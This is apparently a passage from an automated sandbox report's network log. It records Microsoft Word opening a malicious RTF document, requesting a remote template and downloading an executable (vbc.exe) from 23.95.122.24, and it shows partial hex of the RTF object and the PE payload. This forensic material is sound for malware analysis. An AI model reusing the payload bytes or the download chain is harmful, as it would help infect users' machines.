Apr 8, 2021 13:18:01.640276909 CEST	15	IN	Data Raw: 3f a7 5d 24 2d 60 3a 30 3b 5b 36 30 34 3a 21 29 3f 25 26 7c 34 3c 3f 36 3f 3f 3e 36 3e b0 3f 60 2e 3d 25 5e 40 25 7c 21 5d 5f 3d 3f 35 30 3f 3f 3e 3a 3c 3b 3a 35 3c 39 2d 3f 23 7c 32 60 40 3c 23 b5 3f 2f 23 3b 24 21 3a 3f 3f 37 3f 28 3d 35 33 5d Data Ascii: ?]$-`:0;[604:!)?%&\|4<?6??>6>?`.=%^@%\|!]_=?50??>:<;:5<9-?#\|2`@<#?/#;$!:??7?(=53]92^.79=[1^89!`0?\|?#];`#7%@1]~2&,2<1.;!(<@_&+1~_%\|1<-%&7/=2[;_:=,9\|\|,%(0](063-+9?>/%)8?~?_~\|<=+/+&./3$7.[?--:??,:(/4~`[.=4<)+&/47$$'%!?~$-@#2$6?<]!2:
Apr 8, 2021 13:18:01.640302896 CEST	16	IN	Data Raw: 2e 3e 3d 31 2b 35 28 24 3b 3f 26 34 29 36 35 26 5b 2d 2d 3f 36 36 5b 34 21 3f 25 25 2c 39 3c 32 2d 2b 2e 5e 34 27 23 3f 36 34 37 29 2a 33 30 28 35 33 33 3c 25 3f 3f 2c 3f a7 b0 34 3f 2d a7 2f 35 5e b0 b0 5b 25 26 23 28 32 b5 3f b0 36 39 40 24 26 Data Ascii: .>=1+5($;?&4)65&[--?66[4!?%%,9<2-+.^4'#?647)30(533<%??,?4?-/5^[%&#(2?69@$&%+~?58>9#1#(];%1:+\|][:92?@0!?'~$<%(0,-=]7/=%10??%?;-?&-,<;\|'4$8>\|6?_&@~_?`?5(\|)]25<4?3$,?8%?;5:7(?/]'0?7@::@.%>%1,?]@?\|,.<@10?$=4&843%?'-*/6(4@'6
Apr 8, 2021 13:18:01.640325069 CEST	18	IN	Data Raw: 33 2d 31 30 26 33 36 7c 40 32 29 33 37 29 30 37 32 2f 30 37 3b 2c 40 7e 3f 3f 5b 38 38 3b 2d 31 36 40 3e 2d 3c 7b 5c 6f 62 6a 65 63 74 35 31 34 35 34 36 38 34 5c 6f 62 6a 61 75 74 6c 69 6e 6b 5c 6f 62 6a 77 37 35 37 36 5c 6f 62 6a 68 36 39 30 38 Data Ascii: 3-10&36\|@2)37)072/07;,@~??[88;-16@>-<{\object51454684\objautlink\objw7576\objh6908{\\objdata546865{\mrSp79907827990782\7990782 \mrSp79907827990782\7990782} \\ansi
Apr 8, 2021 13:18:01.640367985 CEST	19	IN	Data Raw: 63 61 09 66 0a 65 35 34 36 36 64 30 09 34 0a 33 63 09 66 20 30 64 0a 30 20 37 0d 36 20 34 31 0d 65 39 0d 39 0a 35 20 30 30 20 30 30 0a 30 0a 30 0a 65 39 0a 62 36 20 30 20 30 30 30 20 30 30 65 20 62 20 37 30 0a 65 0a 39 20 61 62 0a 30 20 30 20 30 Data Ascii: cafe5466d043cf 0d0 76 41e995 00 0000e9b6 0 000 00e b 70e9 ab0 0 00005fe9ab00 00006bc0006 9c0135 d9319e9e200 00 009c538 1c3a703000 081c3f44b0 000 5b9d e98d0 000 00e 9880 00000eb 4d ebf75159
Apr 8, 2021 13:18:01.640495062 CEST	21	IN	Data Raw: 38 0d 30 20 39 33 38 63 62 20 34 30 20 36 0a 37 62 65 62 0a 35 20 65 66 64 0a 36 63 09 38 61 0d 32 0d 65 09 37 35 38 66 32 0d 36 35 38 0d 61 20 65 0a 62 37 64 09 33 35 61 0d 35 65 09 39 0d 38 0a 33 0a 39 20 32 66 09 65 62 30 0a 62 09 64 0a 32 0a Data Ascii: 80 938cb 40 67beb5 efd6c8a2e758f2658a eb7d35a5e9839 2feb0bd29cb 6492f644f363094bc 9 35 0b9 b44bd826 e6aa293034 9df474f2fd810b28bfecdd d 7 4064c e2c8 16b0 6ce641a3618f5 5cd1559d2f
Apr 8, 2021 13:18:01.640522957 CEST	22	IN	Data Raw: 32 34 20 65 0d 61 0a 63 65 0a 31 31 0d 37 39 20 34 64 64 0d 36 63 09 34 09 66 09 65 20 38 0d 38 20 30 66 0d 66 20 36 20 38 63 20 37 39 0a 39 09 31 09 65 0a 38 09 61 39 61 20 37 0a 34 20 64 20 31 37 09 36 37 33 20 62 0d 35 61 0d 31 20 33 36 62 38 Data Ascii: 24 eace1179 4dd6c4fe 88 0ff 6 8c 7991e8a9a 74 d 17673 b5a1 36b88 8 1f9d c231 bbb923bc9 de5c00d 962b3410d92cc0 492b 1296843 981 35e52efa1f18279d6431027eabcca5c93955e45494cc93f180ca8e
Apr 8, 2021 13:18:01.656847000 CEST	22	OUT	HEAD /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/................................................................................dot HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 23.95.122.24 Content-Length: 0 Connection: Keep-Alive
Apr 8, 2021 13:18:01.778624058 CEST	22	IN	HTTP/1.1 200 OK Date: Thu, 08 Apr 2021 11:18:02 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Last-Modified: Wed, 07 Apr 2021 18:00:13 GMT ETag: "3263-5bf65b3dc8631" Accept-Ranges: bytes Content-Length: 12899 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49171	23.95.122.24	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 13:18:02.557885885 CEST	23	OUT	GET /zyo/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 23.95.122.24 Connection: Keep-Alive
Apr 8, 2021 13:18:02.677747011 CEST	24	IN	HTTP/1.1 200 OK Date: Thu, 08 Apr 2021 11:18:03 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Last-Modified: Thu, 08 Apr 2021 04:59:44 GMT ETag: "5e800-5bf6eea6ef000" Accept-Ranges: bytes Content-Length: 387072 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 8b 15 e2 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 ae 04 00 00 ec 96 03 00 00 00 00 a3 41 00 00 00 10 00 00 00 c0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 9b 03 00 04 00 00 36 08 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 18 9b 03 67 00 00 00 84 0d 9b 03 3c 00 00 00 00 20 9b 03 a0 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 9b 03 9c 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fa 9a 03 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 9a 03 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 63 ac 04 00 00 10 00 00 00 ae 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 d2 95 03 00 c0 04 00 00 1c 00 00 00 b2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 69 70 75 68 00 00 01 00 00 00 00 a0 9a 03 00 02 00 00 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 75 74 61 00 00 00 79 11 00 00 00 b0 9a 03 00 04 00 00 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 65 77 00 00 00 00 07 49 00 00 00 d0 9a 03 00 4a 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 a0 2c 00 00 00 20 9b 03 00 2e 00 00 00 1e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 99 00 00 00 50 9b 03 00 9a 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL^A@6g< ,PX@.textc `.data@.fipuh@.wutay@.newIJ@@.rsrc, .@@.relocPL@B
Apr 8, 2021 13:18:02.677825928 CEST	26	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 8d 44 24 08 50 8b f1 e8 46 25 00 00 c7 06 34 d2 da 03 8b c6 5e c2 04 00 cc cc cc cc cc cc cc c7 01 34 d2 da 03 e9 50 26 00 00 cc cc cc cc cc 56 8b f1 c7 06 34 d2 da 03 e8 3d 26 00 00 f6 44 24 08 Data Ascii: VD$PF%4^4P&V4=&D$tV-^D$QRT$QRf-D$QRT$QR"ffPffu+D$QRQV,
Apr 8, 2021 13:18:02.678196907 CEST	27	IN	Data Raw: 92 f7 e9 03 d1 c1 fa 04 8b f2 c1 ee 1f 03 f2 8b 7b 10 8b cf 2b cd b8 93 24 49 92 f7 e9 03 d1 c1 fa 04 8b c2 c1 e8 1f 03 c2 3b c6 73 31 8b 54 24 1c 8b 44 24 1c c6 44 24 10 00 8b 4c 24 10 51 52 50 57 b9 01 00 00 00 e8 4a 16 00 00 83 c4 10 83 c7 1c Data Ascii: {+$I;s1T$D$D$L$QRPWJ{_^];v%L$WPQT$RZ_^]V3FFfFPffu+^~rFP'3FFfN
Apr 8, 2021 13:18:02.678592920 CEST	29	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc 55 8b 6c 24 08 56 57 8b f1 85 ed 74 46 8b 56 18 8d 46 04 83 fa 10 72 04 8b 08 eb 02 8b c8 3b e9 72 31 83 fa 10 72 04 8b 08 eb 02 8b c8 8b 7e 14 03 f9 3b fd 76 1d 83 fa 10 72 02 8b 00 8b 4c 24 14 51 2b e8 55 56 Data Ascii: Ul$VWtFVFr;r1r~;vrL$Q+UVc_^]\|$vqF;s VRWvVNS^r,*u~rF_^]F_^]WUQP"~~r;[_^]S\$V
Apr 8, 2021 13:18:02.796221972 CEST	30	IN	Data Raw: ff c7 45 fc 05 00 00 00 8b 7e 10 c6 45 b0 00 8b 45 b0 8b 4d b0 50 51 8d 5f e4 57 8b d7 8b cb e8 ce 0d 00 00 89 46 10 8b c3 8b 5d 10 83 c4 0c e8 ce 09 00 00 8b 45 10 8d 78 1c 8d 5d b4 e8 a0 09 00 00 8b cb e8 19 f4 ff ff 8b 4d f4 64 89 0d 00 00 00 Data Ascii: E~EEMPQ_WF]Ex]MdY_^[M3%]jhhDdPDD3PD$HdjhL$D$$D$ D$D$PL$$D$TRhL$$QD$(X!
Apr 8, 2021 13:18:02.796274900 CEST	31	IN	Data Raw: e8 83 01 00 00 5f 8b c6 5e 5d 5b c2 08 00 8b c6 e8 63 00 00 00 84 c0 74 4c 83 7b 18 08 72 05 8b 4b 04 eb 03 8d 4b 04 83 7e 18 08 8d 6e 04 72 05 8b 45 00 eb 02 8b c5 8b 54 24 14 8d 0c 51 8d 1c 3f 53 51 8b 4e 18 8d 14 09 52 50 e8 b5 18 00 00 83 c4 Data Ascii: _^][ctL{rKK~nrET$Q?SQNRP~~rm3f+_^][VvF;sFPWV3;^u"~rv33;f^3f3;^VrBrw
Apr 8, 2021 13:18:02.796814919 CEST	33	IN	Data Raw: 50 8d 4c 24 08 c7 44 24 04 00 00 00 00 e8 2f 0b 00 00 68 b8 09 db 03 8d 4c 24 08 51 c7 44 24 0c 34 d2 da 03 e8 00 18 00 00 8d 14 cd 00 00 00 00 2b d1 03 d2 03 d2 52 e8 03 15 00 00 83 c4 04 83 c4 10 c3 cc cc cc cc cc cc cc cc cc cc cc 83 c8 ff 33 Data Ascii: PL$D$/hL$QD$4+R3s,$PL$D$hL$QD$4RL$w3Q3sD$PL$D$ghL$QD$48
Apr 8, 2021 13:18:02.796857119 CEST	34	IN	Data Raw: 8b 0c 24 33 cc e8 ce 03 00 00 59 c3 cc cc cc cc cc cc cc cc 6a ff 68 c5 ba 44 00 64 a1 00 00 00 00 50 a1 d0 c0 44 00 33 c4 50 8d 44 24 04 64 a3 00 00 00 00 33 c0 89 44 24 0c 3b c8 74 1a 6a ff 89 41 14 c7 41 18 0f 00 00 00 50 88 41 04 8b 44 24 1c Data Ascii: $3YjhDdPD3PD$d3D$;tjAAPAD$P\|L$dY~rFP3FFF~rFP3FFFPQD3$D$
Apr 8, 2021 13:18:02.796896935 CEST	36	IN	Data Raw: c3 8b ff 55 8b ec 8d 45 1c 50 ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 cc 29 00 00 83 c4 18 5d c3 8b ff 55 8b ec 8d 45 14 50 6a 00 ff 75 10 ff 75 0c ff 75 08 e8 fe 2a 00 00 83 c4 14 5d c3 8b ff 55 8b ec 8d 45 18 50 ff 75 14 ff 75 10 ff 75 Data Ascii: UEPuuuuu)]UEPjuuu]UEPuuuu]UEPuC'YY]UEPug'YY]UEPuu2']UEPuuR']``US]VWt&P>FV+
Apr 8, 2021 13:18:02.796936989 CEST	37	IN	Data Raw: 85 d8 fc ff ff 89 85 28 fd ff ff 8d 85 30 fd ff ff 83 c4 0c 89 85 2c fd ff ff 89 85 e0 fd ff ff 89 8d dc fd ff ff 89 95 d8 fd ff ff 89 9d d4 fd ff ff 89 b5 d0 fd ff ff 89 bd cc fd ff ff 66 8c 95 f8 fd ff ff 66 8c 8d ec fd ff ff 66 8c 9d c8 fd ff Data Ascii: (0,ffffffEM0Ij(PuujwTYhPM3[
Apr 8, 2021 13:18:02.796987057 CEST	39	IN	Data Raw: 5d c2 04 00 8b ff 55 8b ec 8b 45 08 83 c1 09 51 83 c0 09 50 e8 ed 64 00 00 59 59 33 c9 85 c0 0f 9f c1 8b c1 5d c2 04 00 8d 41 08 c3 8b c1 c7 00 fc d2 da 03 c2 04 00 8b c1 c2 04 00 8b ff 56 6a 01 68 c8 c0 44 00 8b f1 e8 5f f6 ff ff c7 06 34 d2 da Data Ascii: ]UEQPdYY3]AVjhD_4^UufYtu!YtDDuDhODfYVMhEPU=DuQluxjhBgYY]MZf9@u6

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49172	23.95.122.24	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 13:19:57.084356070 CEST	436	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: 23.95.122.24
Apr 8, 2021 13:19:57.206953049 CEST	437	IN	HTTP/1.1 302 Found Date: Thu, 08 Apr 2021 11:19:58 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 X-Powered-By: PHP/7.3.27 Location: http://23.95.122.24/dashboard/ Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Apr 8, 2021 13:19:57.207365990 CEST	437	OUT	OPTIONS /dashboard/ HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: 23.95.122.24
Apr 8, 2021 13:19:57.328922987 CEST	437	IN	HTTP/1.1 200 OK Date: Thu, 08 Apr 2021 11:19:58 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Allow: OPTIONS,HEAD,GET,POST,TRACE Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html
Apr 8, 2021 13:19:57.695388079 CEST	438	IN	HTTP/1.1 200 OK Date: Thu, 08 Apr 2021 11:19:58 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Allow: OPTIONS,HEAD,GET,POST,TRACE Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html
Apr 8, 2021 13:20:00.985137939 CEST	438	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 23.95.122.24
Apr 8, 2021 13:20:01.105123997 CEST	438	IN	HTTP/1.1 302 Found Date: Thu, 08 Apr 2021 11:20:02 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 X-Powered-By: PHP/7.3.27 Location: http://23.95.122.24/dashboard/ Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Apr 8, 2021 13:20:01.105659962 CEST	438	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 64 61 73 68 62 6f 61 72 64 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 Data Ascii: PROPFIND /dashboard/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 23.95.122.24
Apr 8, 2021 13:20:01.228305101 CEST	439	IN	HTTP/1.1 405 Method Not Allowed Date: Thu, 08 Apr 2021 11:20:02 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Allow: OPTIONS,HEAD,GET,POST,TRACE Content-Length: 328 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
Apr 8, 2021 13:20:01.586461067 CEST	440	IN	HTTP/1.1 405 Method Not Allowed Date: Thu, 08 Apr 2021 11:20:02 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Allow: OPTIONS,HEAD,GET,POST,TRACE Content-Length: 328 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
Apr 8, 2021 13:20:03.142019987 CEST	440	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 23.95.122.24
Apr 8, 2021 13:20:03.261605978 CEST	441	IN	HTTP/1.1 302 Found Date: Thu, 08 Apr 2021 11:20:04 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 X-Powered-By: PHP/7.3.27 Location: http://23.95.122.24/dashboard/ Content-Length: 0 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Apr 8, 2021 13:20:03.262105942 CEST	441	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 64 61 73 68 62 6f 61 72 64 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 Data Ascii: PROPFIND /dashboard/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 23.95.122.24
Apr 8, 2021 13:20:03.383797884 CEST	441	IN	HTTP/1.1 405 Method Not Allowed Date: Thu, 08 Apr 2021 11:20:04 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Allow: OPTIONS,HEAD,GET,POST,TRACE Content-Length: 328 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
Apr 8, 2021 13:20:03.679924011 CEST	442	IN	HTTP/1.1 405 Method Not Allowed Date: Thu, 08 Apr 2021 11:20:04 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Allow: OPTIONS,HEAD,GET,POST,TRACE Content-Length: 328 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 